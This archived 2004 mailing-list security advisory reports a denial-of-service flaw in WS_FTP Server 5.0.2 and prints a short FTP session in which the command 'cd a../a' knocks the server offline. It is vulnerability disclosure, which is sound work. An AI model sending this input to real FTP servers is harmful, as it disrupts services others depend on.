[vulnwatch] WS_FTP Server Denial of Service Vulnerability

From: lion (lion_at_cnhonker.net)
Date: 08/29/04

  • Next message: e0r: "CuteNews News.txt writable to world"
    Date: Mon, 30 Aug 2004 02:40:46 +0800
    To: "bugtraq" <bugtraq@securityfocus.com>
    
    

    [vulnwatch] WS_FTP Server Denial of Service Vulnerability

    www.cnhonker.com
    Security Advisory

    Advisory Name: WS_FTP Server Denial of Service Vulnerability
    Release Date: 08/30/2004
    Affected version: WS_FTP Server 5.0.2
    Author: lion <lion@cnhonker.net>

    Overview:

    A vulnerability has been found in WS_FTP Server. The problem \
    is in the module of file path parse will cause FTP server to \
    consume large amounts of CPU power.

    Exploit:

    E:\>ftp localhost
    Connected to ibm.
    220-ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
    220-Fri Aug 27 14:12:19 2004
    220-29 days remaining on evaluation.
    220 ibm X2 WS_FTP Server 5.0.2.EVAL (106633167)
    User (ibm:(none)): ftp
    331 Password required
    Password:
    230 user logged in
    ftp> cd a../a
    Connection closed by remote host.

    About HUC:

    HUC is still alive.


  • Next message: e0r: "CuteNews News.txt writable to world"

    Relevant Pages

    • Help with IPFW + NATD + Passive FTP
      ... passive FTP connections through IPFW with NATD enabled. ... $cmd 005 allow all from any to any via dc0 ... # Interface facing Public internet ... # Allow out access to my ISP's Domain name server. ...
      (freebsd-questions)
    • RE: Client Computers cannot upload or download from Remote FTP ser
      ... SBS External NIC - Cannot FTP From this server ... SBS Internal NIC ... FTP server is Checked in Routing and Remote Access - Internet Connection - ...
      (microsoft.public.windows.server.sbs)
    • Re: FTP PUT with Store Unique
      ... The best list for topics related to the Communications Server IP ... command or vice versa. ... Instructs the FTP client not to include a name with the STOU ... -- If NONAME is in effect, no name string specifying a foreign_file value follows ...
      (bit.listserv.ibm-main)
    • RE: Client Computers cannot upload or download from Remote FTP ser
      ... Only FTP via the MS DOS FTP Client ... The server that works is a member of the SBS's Domain, BUT as I indicated, ... the router, not the SBS server. ... The client event log has nothing related logged. ...
      (microsoft.public.windows.server.sbs)
    • Re: IIS 6.0 FTP
      ... That's the point I'm making--you are testing the wrong server. ... your FTP server is ftp.kilduff.com. ... than IIS? ... I understand your have the order entry program, ...
      (microsoft.public.inetserver.iis.ftp)